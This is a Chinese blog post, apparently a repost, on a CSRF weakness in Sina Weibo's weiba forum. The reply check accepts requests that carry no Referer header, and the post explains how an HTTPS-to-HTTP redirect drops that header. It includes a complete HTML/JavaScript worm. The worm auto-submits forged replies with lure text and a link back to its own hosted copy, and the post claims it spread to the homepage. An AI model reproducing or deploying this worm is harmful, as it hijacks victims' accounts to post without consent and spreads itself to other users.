最新消息:

绕过新浪referer限制的小技巧

CSRF admin 1647浏览 0评论

1、出问题的地方

http://weiba.weibo.com

2、微吧回复主题的时候, 进行了CSRF校验, 但是,其逻辑是如果header里没有referer,也算校验通过,估计是为了兼容关闭了referer的浏览器而这样

3、但是,只要构造出不带referer的post页面,马上变成黑客手中的漏洞了

4、比如在https跳转到http时就不会带referer,把攻击的蠕虫放在https的服务器上即可

借用@风萧萧的代码,附一个简单的蠕虫

lt;html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
</head>
<body>
<form id="fxx" name="fxx" action="http://weiba.weibo.com/aj_re/add?__rnd=1362498869847" method="POST">
<input type="text" name="text" id="content" value="test" />
<input type="text" name="tid" value="3552602802252056" />
<input type="text" name="pid" value="" />
<input type="text" name="forward" value="1" />
<input type="text" name="_t" value="0" />
<input type="submit" value="submit" />
</form>
<script>
	var random=new Array();
	random[0]="";
	random[1]="有帅哥哦";
	random[2]="有萝莉哦";
	random[3]="有小清新哦";
	random[4]="有女王哦";
	random[5]="有御姐哦";
	random[6]="有高帅富哦";
	random[7]="有女屌丝哦";
	random[8]="有美女哦";
	random[9]="有苍老师哦";
	var num =parseInt(Math.random()*10);
	var constr="   follow me! https://xssed.me/csrf/weibo.html";
	var sendstr=random[num]+constr;
	alert(sendstr);
	document.getElementById("content").setAttribute("value",sendstr);
	document.fxx.submit();
</script>
</body>
</html>

 

漏洞证明:

1、微吧回帖地址

060000080e1bea3132f8b65532b44d225c4953e7

2、去掉referer的post成功突破

06000015bc06f70bdb36269a64bbf9fb5d6c8bd3

3、蠕虫发布到首页
06000023746cedf1eb9ef64130eb2f33bec19ba5

ps:学到的知识:https跳转到http时就不会带referer,把攻击的蠕虫放在https的服务器上即可绕过refer限制

转载请注明:jinglingshu的博客 » 绕过新浪referer限制的小技巧


Warning: Use of undefined constant PRC - assumed 'PRC' (this will throw an Error in a future version of PHP) in /usr/share/nginx/html/wp-content/themes/d8/comments.php on line 17
发表我的评论
取消评论

表情

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址